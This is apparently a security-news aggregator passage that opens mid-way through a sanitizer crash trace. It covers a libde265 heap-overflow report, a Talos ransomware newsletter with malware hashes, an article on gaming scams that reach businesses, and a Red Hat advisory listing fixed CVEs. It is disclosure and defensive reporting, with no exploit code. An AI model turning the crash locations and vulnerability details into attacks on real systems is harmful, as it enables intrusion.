        #5 0x7f929c749fd4 in decoder_context::generate_unavailable_reference_picture(seq_parameter_set const*, int, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x140fd4)
        #6 0x7f929c74cee1 in decoder_context::process_reference_picture_set(slice_segment_header*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x143ee1)
        #7 0x7f929c75046a in decoder_context::process_slice_segment_header(slice_segment_header*, de265_error*, long, nal_header*, void*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x14746a)
        #8 0x7f929c745970 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13c970)
        #9 0x7f929c748be6 in decoder_context::decode_NAL(NAL_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13fbe6)
        #10 0x7f929c74924c in decoder_context::decode(int*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x14024c)
        #11 0x7f929c72f3f2 in de265_decode (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1263f2)
        #12 0x5613fc1319a5 in main (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x79a5)
        #13 0x7f929c0d7d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x2b6bbb) in ff_hevc_put_hevc_qpel_pixels_8_sse(short*, long, unsigned char const*, long, int, int, short*)
    Shadow bytes around the buggy address:
      0x0c367fff99e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c367fff99f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c367fff9a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c367fff9a10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c367fff9a20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c367fff9a30: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c367fff9a40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c367fff9a50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c367fff9a60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c367fff9a70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c367fff9a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==733371==ABORTING
    

**POC**

660.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

CVE-2022-47664: heap-buffer-overflow (libde265/build/libde265/libde265.so+0x2b6bbb) in ff_hevc_put_hevc_qpel_pixels_8_sse(short*, long, unsigned char const*, long, int, int, short*) · Issue #368 · strukturag/libde265

Serious sanctions and legal consequences may be slowing ransomware groups down, but it's still unclear if this is a permanent shift.

Thursday, March 2, 2023 14:03

Welcome to this week’s edition of the Threat Source newsletter.

For years, we as a cybersecurity community have been discussing ways we can fight the global ransomware problem. This included things like pushing for more sanctions against international ransomware groups, new laws from federal governments and decreased access to virtual currency often used by actors to stay undetected.

Now, here’s the crazy thing: It might be working.

As Talos discussed in our Year in Review report, ransomware engagements made up a smaller portion of Cisco Talos Incident Response’s engagements in 2022 compared to the previous year, and there’s been a greater democratization of ransomware families, meaning they’re less siloed and more focused into a few larger groups.

A study from blockchain analysis group Chainanalysis also found that ransomware groups extorted about $456.8 million from victims in 2022, a roughly 40 percent decrease from 2021 and 2020. The Wall Street Journal also recently reported that the U.S. government finally feels it's on the offensive when it comes to ransomware.

U.S. Deputy Attorney General Lisa Monaco told the paper that recent ransomware trends reflect "the pivot that we have made to a posture where we’re on our front foot. We’re focusing on making sure we’re doing everything to prevent the attacks in the first place.”

Yes, there are still major ransomware attacks happening (take the recent Dole cyber attack that halted production briefly for the food giant). But I feel like it’s not being talked about enough that defenders may be actually making some headway here thanks to private companies (like Talos) and global governments working together.

It seems to be a confluence of several things and not just one magic solution. Governments are taking more frequent and serious action to sanction ransomware actors and the individuals behind them, such as the recent penalties against Trickbot members. And some actors are even being arrested and being served criminal charges and jail time.

With improved backups, many ransomware targets are also bouncing back better than ever before and can hopefully avoid paying the requested ransom to their attackers. And asset seizures and freezes have even forced some ransomware groups to lay off people.

2022 could be an aberration. As we also pointed out in our Year in Review, there was a brief pause in ransomware activity at the onset of Russia’s invasion of Ukraine. It could also just be that the defenders got lucky.

This isn’t the time to take our foot off the gas and start turning our attention toward things like AI chatbots — ransomware continues to be a major threat to everyone, including some of society’s most important institutions like hospitals and schools. But I do think it’s important to step back every once in a while to enjoy the victories.

**The one big thing**

The U.S. Cybersecurity and Infrastructure Security Agency is warning that attackers are actively exploiting CVE-2022-36537, an unspecified vulnerability in ZK Framework AuUploader. This poses a significant threat to the software supply chain if any instances are still unpatched, and CISA warned the vulnerability “poses a significant risk to the federal enterprise.” Attackers are reportedly using the vulnerability to install backdoors on servers, specifically through ConnectWise's R1Soft Server Backup Manager, which utilizes the ZK Framework.

**Why do I care?**

ZK is an open-source Ajax Web app framework written in Java, allowing users to create GUIs for web applications without a deep knowledge of programming. Many open-source projects and software utilize the framework, so the impact of this vulnerability could be wide-reaching. Open-source reporting indicates that attackers could exploit the vulnerability in ConnectWise R1Soft to bypass authentication, upload a backdoor and gain the ability to execute remote code.

**So now what?**

Researchers first disclosed this vulnerability in October, so projects and products that utilize the framework have had plenty of time to patch. ConnectWise released its own patch on Oct. 28.

**Top security headlines of the week**

The Pentagon is investigating a potential yearslong email leak from the U.S. military’s Special Operations Command. A security researcher discovered that anyone who knew the IP address of the server could access the data without a password. However, the server was secured once the researcher disclosed their findings. The emails leaked included information about U.S. military contracts and messages from Department of Defense employees asking to have various pieces of paperwork processed. SOCOM said there was no evidence that anyone hacked the organization’s network and this was merely an error. (CNN, Bloomberg)

A journalist accessed his own bank account using an AI-generated voice, bypassing the bank’s automated phone system. The reporter used a fake version of his voice using a readily available AI tool online and was able to read off a list of recent transactions and account balances. Real-world abuse of this system is likely rare at this point, but it showcases why banks and other services should drop voice identification as a login method. Users have already started using AI voice tools to make memes and fake videos of noted individuals saying outlandish things. (Vice)

Satellite TV provider Dish confirmed a ransomware attack was responsible for a multi-day outage and that attackers may have exfiltrated data from its systems. The company said in a filing to the U.S. Securities and Exchange Commission that the attackers obtained “certain data” from its IT systems, potentially including personal information, though it was unclear if that information belonged to Dish employees, customers or both. As of Wednesday morning, the attack was still affecting the company’s main website, its mobile apps and customer support systems, and Dish's Sling TV streaming service. (TechCrunch, Bleeping Computer)

**Can’t get enough Talos?**

*   Threat Roundup for Feb. 17 - 24
*   Vulnerability Spotlight: EIP Stack Group OpENer open to two remote code execution vulnerabilities
*   Evaluating the Cyberwar Set Off by Russian Invasion of Ukraine
*   SBOM is a 'massive galaxy of mess' for supply chain security

**Upcoming events where you can find Talos**

**WiCyS** **(March 16 - 18)**

Denver, CO

**RSA** **(April 24 - 27)**

San Francisco, CA

**Most prevalent malware files from Talos telemetry over the past week**

  
**SHA 256:** 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f  
**Typical Filename:** VID001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Worm.Coinminer::1201

**SHA 256:** 00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725  
**MD5:** d47fa115154927113b05bd3c8a308201  
**Typical Filename:** mssqlsrv.exe  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.65065311

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
**MD5:** 93fefc3e88ffb78abb36365fa5cf857c  
**Typical Filename:** Wextract  
**Claimed Product:** Internet Explorer  
**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

**SHA 256:** de3908adc431d1e66656199063acbb83f2b2bfc4d21f02076fe381bb97afc423  
**MD5:** 954a5fc664c23a7a97e09850accdfe8e  
**Typical Filename:** teams15.exe  
**Claimed Product:** teams15  
**Detection Name**: Gen:Variant.MSILHeracles.59885

**SHA 256:** e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c  
**MD5:** a087b2e6ec57b08c0d0750c60f96a74c  
**Typical Filename:** AAct.exe  
**Claimed Product:** N/A  
**Detection Name:** PUA.Win.Tool.Kmsauto::1201

Threat Source newsletter (March 2, 2023) — Little victories in the fight against ransomware

It's 10 p.m. Do you know what your children are playing? In the age of remote work, hackers are actively targeting kids, with implications for enterprises.

Video games are a part of nearly every kid's life, and distributed work is increasingly a part of every adult's. According to experts, it's a recipe for small-time gaming scams to turn into larger-scale business compromises.

Hackers will leverage anything popular or good in this world, and video games are no exception. As described in a March 1 blog post from Kaspersky, financially motivated attackers are targeting children, in particular, with open-faced scams aimed at stealing in-game items, account credentials, and bank details.

The story doesn't necessarily end there, though. Even a primitive phishing attack against a kid playing Fortnite could, theoretically, turn into a wider attack not just against the parent but also the parent's workplace.

An attack that targets a business, through an employee or through an employee's child, may seem like a step too much work when phishing and business email compromise are so much simpler. But, to state the obvious: Children are easy marks, and nearly all of them play video games. That, combined with the proliferation of remote work and bring-your-own-device (BYOD) policies, makes this vector a long-tailed but fruitful one for attackers.

**How Games Get Hacked**

Last year, researchers for Avanan uncovered a surge of Trojans hidden in cheat codes for the ultrapopular online game Roblox. "The file would be downloaded by the child," explains Jeremy Fuchs, cybersecurity researcher/analyst at Avanan, "and then, most likely, mistakenly uploaded to a corporate OneDrive folder. This file installs library files (DLL) into the Windows system folder. The malicious code can be perpetually referenced by Windows and remains running."

This is just one of many forms that gaming scams can take. For example, "we've seen multiple cases in which a BYOD device was compromised via a gaming-related phishing site, which led to the compromise of the connected corporate network," says Jordan LaRose, practice director for infrastructure security at NCC Group. "Another gaming-related vector we've seen in the wild are direct exploits through users playing games. This is most common on mobile devices but can affect desktop gaming as well. Attackers will either embed an exploit directly in an attractive mobile game that users download and thereby compromise their mobile device, or target a user playing a game with a remote code execution (RCE) vulnerability to compromise the computer running it."

Mere weeks ago, such a vulnerability was being exploited in the mega-hit Grand Theft Auto V.

The potential damage caused by such a compromise is clear. "Trojans like this can break applications, corrupt or remove data, and send information to the hacker," Fuchs says.

What's less obvious but more worrisome is how this damage could extend beyond the device or even the home in question.

**How Gaming Hacks Spread to Businesses**

Fuchs puts it bluntly: "The perimeter no longer exists."

"We can access work documents on home computers and vice versa," he says, "but it also relates to game usage."

Young children, especially, often play games from their parents' PCs and mobile phones or, if nothing else, their home Wi-Fi. Parents then take their PCs and phones to work, or work remotely from their home network.

Fuchs theorizes that kids "could be playing on their parents' computer and accidentally upload it. This is an easy way for compromises and malicious files to easily infect your corporate cloud." But in most cases, a child need not go that far — attackers can make the jump from home to office on their own.

"In the era of BYOD and remote working," LaRose explains, "attackers often just need to compromise a user's personal computer to get a foothold on a corporate network. Once an attacker has a foothold on a personal device, they can often steal a VPN session or browser session, or simply find a user's corporate credentials stored in their computer."

**How Businesses Can Stop the Spread**

In their blog post, Kaspersky researchers recommended that gamers practice diligent cyber hygiene: strong passwords, two-factor authentication, antivirus, and the like. They also highlighted the utility of virtual bank cards that only fill to meet the exact amount of a particular purchase.

"By entering the numbers from your bank card," Kaspersky explained, "you risk losing all the funds you have there. And remember that a bundle of licensed games selling for a song is a reason to be wary."

LaRose stresses that "gaming is not innately any more insecure an activity than normal Web browsing." Still, because gaming can be _just as_ insecure, "businesses should do everything they can to separate a user's presence in the corporate environment and the personal one."

He recommends implementing endpoint/extended detection and response (EDR/XDR) and a security operations center (SOC) that can help respond in case of a breach.

The most important defenses of all, though, are the policies and procedures businesses that implement to address remote work and BYOD.

"If BYOD is absolutely necessary for a business to function," LaRose says, "they should limit the policy to mobile phones only and ensure they use a strong mobile device management (MDM) solution that separates work and personal data on the phone. This is an imperfect solution with some workarounds for attackers but will at the very least serve as a deterrent and give the business more visibility into any potential exposures."

Hackers Target Young Gamers: How Your Child Can Cause Business Compromise

Red Hat Security Advisory 2023-1047-01 - A new image is available for Red Hat Single Sign-On 7.6.2, running on Red Hat OpenShift Container Platform from the release of 3.11 up to the release of 4.12.0. Issues addressed include code execution, cross site scripting, denial of service, deserialization, html injection, memory exhaustion, server-side request forgery, and traversal vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: Red Hat Single Sign-On 7.6.2 for OpenShift image security and enhancement update  
Advisory ID:       RHSA-2023:1047-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1047  
Issue date:        2023-03-01  
CVE Names:         CVE-2018-14040 CVE-2018-14042 CVE-2019-11358  
                   CVE-2020-11022 CVE-2021-35065 CVE-2021-44906  
                   CVE-2022-1274 CVE-2022-1438 CVE-2022-1471  
                   CVE-2022-2764 CVE-2022-3782 CVE-2022-3916  
                   CVE-2022-4039 CVE-2022-24785 CVE-2022-25857  
                   CVE-2022-31129 CVE-2022-37603 CVE-2022-38749  
                   CVE-2022-38750 CVE-2022-38751 CVE-2022-40149  
                   CVE-2022-40150 CVE-2022-40303 CVE-2022-40304  
                   CVE-2022-42003 CVE-2022-42004 CVE-2022-45047  
                   CVE-2022-45693 CVE-2022-46175 CVE-2022-46363  
                   CVE-2022-46364 CVE-2022-47629 CVE-2023-0091  
                   CVE-2023-0264 CVE-2023-21835 CVE-2023-21843  
====================================================================  
1. Summary:

A new image is available for Red Hat Single Sign-On 7.6.2, running on Red  
Hat OpenShift Container Platform from the release of 3.11 up to the release  
of 4.12.0.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat Single Sign-On is an integrated sign-on solution, available as a  
Red Hat JBoss Middleware for OpenShift containerized image. The Red Hat  
Single Sign-On for OpenShift image provides an authentication server that  
you can use to log in centrally, log out, and register. You can also manage  
user accounts for web applications, mobile applications, and RESTful web  
services.

* snakeyaml: Constructor Deserialization Remote Code Execution  
(CVE-2022-1471)  
* keycloak: path traversal via double URL encoding (CVE-2022-3782)  
* RH-SSO for OpenShift images: unsecured management interface exposed to  
adjacent network (CVE-2022-4039)  
* snakeyaml: Denial of Service due to missing nested depth limitation for  
collections (CVE-2022-25857)  
* moment: inefficient parsing algorithm resulting in DoS (CVE-2022-31129)  
* sshd-common: mina-sshd: Java unsafe deserialization vulnerability  
(CVE-2022-45047)  
* CXF: Apache CXF: SSRF Vulnerability (CVE-2022-46364)  
* keycloak: keycloak: user impersonation via stolen uuid code  
(CVE-2023-0264)  
* bootstrap: Cross-site Scripting (XSS) in the collapse data-parent  
attribute (CVE-2018-14040)  
* rcue-bootstrap: bootstrap: Cross-site Scripting (XSS) in the  
data-container property of tooltip (CVE-2018-14042)  
* jquery: Prototype pollution in object's prototype leading to denial of  
service, remote code execution, or property injection (CVE-2019-11358)  
* jquery: Cross-site scripting due to improper injQuery.htmlPrefilter  
method (CVE-2020-11022)  
* keycloak: glob-parent: Regular Expression Denial of Service  
(CVE-2021-35065)  
* keycloak: minimist: prototype pollution (CVE-2021-44906)  
* keycloak: missing email notification template allowlist (CVE-2022-1274)  
* keycloak: XSS on izmpersonation under specific circumstances  
(CVE-2022-1438)  
* keycloak: Session takeover with OIDC offline refreshtokens  
(CVE-2022-3916)  
* Moment.js: Path traversal in moment.locale (CVE-2022-24785)  
* loader-utils: loader-utils:Regular expression denial of service  
(CVE-2022-37603)  
* snakeyaml: Uncaught exception in  
org.yaml.snakeyaml.composer.Composer.composeSequenceNode (CVE-2022-38749)  
* snakeyaml: Uncaught exception in  
org.yaml.snakeyaml.constructor.BaseConstructor.constructObject  
(CVE-2022-38750)  
* snakeyaml: Uncaught exception in  
java.base/java.util.regex.Pattern$Ques.match (CVE-2022-38751)  
* jettison: parser crash by stackoverflow (CVE-2022-40149)  
* jettison: memory exhaustion via user-supplied XML or JSON data  
(CVE-2022-40150)  
* jettison: If the value in map is the map's self, the new new  
JSONObject(map) cause StackOverflowError which may lead to dos  
(CVE-2022-45693)  
* json5: Prototype Pollution in JSON5 via Parse Method (CVE-2022-46175)  
* jackson-databind: deep wrapper array nesting wrt  
UNWRAP_SINGLE_VALUE_ARRAYS (CVE-2022-42003)  
* jackson-databind: use of deeply nested arrays (CVE-2022-42004)  
* CXF: Apache CXF: directory listing / code exfiltration (CVE-2022-46363)  
* undertow: DoS can be achieved as Undertow server waits for the LAST_CHUNK  
forever for EJB invocations (CVE-2022-2764)  
* keycloak: Client Registration endpoint does not check token revocation  
(CVE-2023-0091)

This erratum releases a new image for Red Hat Single Sign-On 7.6.2 for use  
within the Red Hat OpenShift Container Platform (from the release of 3.11  
up to the release of 4.12.0) cloud computing Platform-as-a-Service (PaaS)  
for on-premise or private cloud deployments, aligning with the standalone  
product release.

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

1601614 - CVE-2018-14040 bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute  
1601617 - CVE-2018-14042 bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip  
1701972 - CVE-2019-11358 jquery: Prototype pollution in object's prototype leading to denial of service, remote code execution, or property injection  
1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method  
2031904 - CVE-2022-1438 keycloak: XSS on impersonation under specific circumstances  
2066009 - CVE-2021-44906 minimist: prototype pollution  
2072009 - CVE-2022-24785 Moment.js: Path traversal  in moment.locale  
2073157 - CVE-2022-1274 keycloak: HTML injection in execute-actions-email Admin REST API  
2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS  
2117506 - CVE-2022-2764 Undertow: DoS can be achieved as Undertow server waits for the LAST_CHUNK forever for EJB invocations  
2126789 - CVE-2022-25857 snakeyaml: Denial of Service due to missing nested depth limitation for collections  
2129706 - CVE-2022-38749 snakeyaml: Uncaught exception in org.yaml.snakeyaml.composer.Composer.composeSequenceNode  
2129707 - CVE-2022-38750 snakeyaml: Uncaught exception in org.yaml.snakeyaml.constructor.BaseConstructor.constructObject  
2129709 - CVE-2022-38751 snakeyaml: Uncaught exception in java.base/java.util.regex.Pattern$Ques.match  
2135244 - CVE-2022-42003 jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS  
2135247 - CVE-2022-42004 jackson-databind: use of deeply nested arrays  
2135770 - CVE-2022-40150 jettison: memory exhaustion via user-supplied XML or JSON data  
2135771 - CVE-2022-40149 jettison: parser crash by stackoverflow  
2138971 - CVE-2022-3782 keycloak: path traversal via double URL encoding  
2140597 - CVE-2022-37603 loader-utils:Regular expression denial of service  
2141404 - CVE-2022-3916 keycloak: Session takeover with OIDC offline refreshtokens  
2143416 - CVE-2022-4039 rhsso-operator: unsecured management interface exposed to adjecent network  
2145194 - CVE-2022-45047 mina-sshd: Java unsafe deserialization vulnerability  
2150009 - CVE-2022-1471 SnakeYaml: Constructor Deserialization Remote Code Execution  
2155681 - CVE-2022-46363 Apache CXF: directory listing / code exfiltration  
2155682 - CVE-2022-46364 Apache CXF: SSRF Vulnerability  
2155970 - CVE-2022-45693 jettison:  If the value in map is the map's self, the new new JSONObject(map) cause StackOverflowError which may lead to dos  
2156263 - CVE-2022-46175 json5: Prototype Pollution in JSON5 via Parse Method  
2156324 - CVE-2021-35065 glob-parent: Regular Expression Denial of Service  
2158585 - CVE-2023-0091 keycloak: Client Registration endpoint does not check token revocation  
2160585 - CVE-2023-0264 keycloak: user impersonation via stolen uuid code

5. References:

https://access.redhat.com/security/cve/CVE-2018-14040  
https://access.redhat.com/security/cve/CVE-2018-14042  
https://access.redhat.com/security/cve/CVE-2019-11358  
https://access.redhat.com/security/cve/CVE-2020-11022  
https://access.redhat.com/security/cve/CVE-2021-35065  
https://access.redhat.com/security/cve/CVE-2021-44906  
https://access.redhat.com/security/cve/CVE-2022-1274  
https://access.redhat.com/security/cve/CVE-2022-1438  
https://access.redhat.com/security/cve/CVE-2022-1471  
https://access.redhat.com/security/cve/CVE-2022-2764  
https://access.redhat.com/security/cve/CVE-2022-3782  
https://access.redhat.com/security/cve/CVE-2022-3916  
https://access.redhat.com/security/cve/CVE-2022-4039  
https://access.redhat.com/security/cve/CVE-2022-24785  
https://access.redhat.com/security/cve/CVE-2022-25857  
https://access.redhat.com/security/cve/CVE-2022-31129  
https://access.redhat.com/security/cve/CVE-2022-37603  
https://access.redhat.com/security/cve/CVE-2022-38749  
https://access.redhat.com/security/cve/CVE-2022-38750  
https://access.redhat.com/security/cve/CVE-2022-38751  
https://access.redhat.com/security/cve/CVE-2022-40149  
https://access.redhat.com/security/cve/CVE-2022-40150  
https://access.redhat.com/security/cve/CVE-2022-40303  
https://access.redhat.com/security/cve/CVE-2022-40304  
https://access.redhat.com/security/cve/CVE-2022-42003  
https://access.redhat.com/security/cve/CVE-2022-42004  
https://access.redhat.com/security/cve/CVE-2022-45047  
https://access.redhat.com/security/cve/CVE-2022-45693  
https://access.redhat.com/security/cve/CVE-2022-46175  
https://access.redhat.com/security/cve/CVE-2022-46363  
https://access.redhat.com/security/cve/CVE-2022-46364  
https://access.redhat.com/security/cve/CVE-2022-47629  
https://access.redhat.com/security/cve/CVE-2023-0091  
https://access.redhat.com/security/cve/CVE-2023-0264  
https://access.redhat.com/security/cve/CVE-2023-21835  
https://access.redhat.com/security/cve/CVE-2023-21843  
https://access.redhat.com/security/updates/classification/#important

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY//t1dzjgjWX9erEAQia2w/+OL2GUzx63gPKwDpJXSFQEA2gn7Bu3FcP  
Vs6FCL7PpZ0u4i0/5n7bzpGf4qGlHbbuVUw7Y4sHdHhKSI+boX54pjrJX1ccfznn  
Lg/ENsMmzXen9MvjH5b1D3W7Mho7skUuCVCBu5y7cCOdOxUohyRzLkny/NjQ1nD6  
eRDbj/qSRJNEvV7JqUvRhwaSiJK7qQtXsPV7FEDdUq0YwTnGJsKJXc67lAuJphZT  
bYVNCHfZrfakuAnj4eR8rX+iacPlZY6a0sYbyyT/uHw27oiNpXwPtoNCSkDwmjZ3  
IxKNjpap3zOJUou+XDj/4uBSALftooJnxTi++8lqK0BLpXeQLd83SeP9IiYmnCD+  
CtHnfbeFYKVFPyGWIUUddVCJOv4qznlIqxvWcgy0b1xi32ZFaqGTFZNmt/6Is06y  
AO+yv7UE0cxthEqQASwlRWpct797Tdd4culodXiF/OBKAmznzmMt/MLWgZ7WiszD  
q5ECUJNlcLsSB2E+RCXswVzZU8DwlH0DV/rqJ7+c5y0HH+veMXKY/GqIcUJwRx/b  
8Q6kskM6p9UB9j5r1GpRlnWMuQicw5RuC5sY/tPbMhUnMxPzKHeI0GatQRZrAE+0  
iwPVbzdWk25PdKb/2LXdKruqcLv9INvvN0jwEUG6vKXJU4HwANLCc3MItJpsnZX4  
ZpcQ6Sd41lc=+e7l  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#rce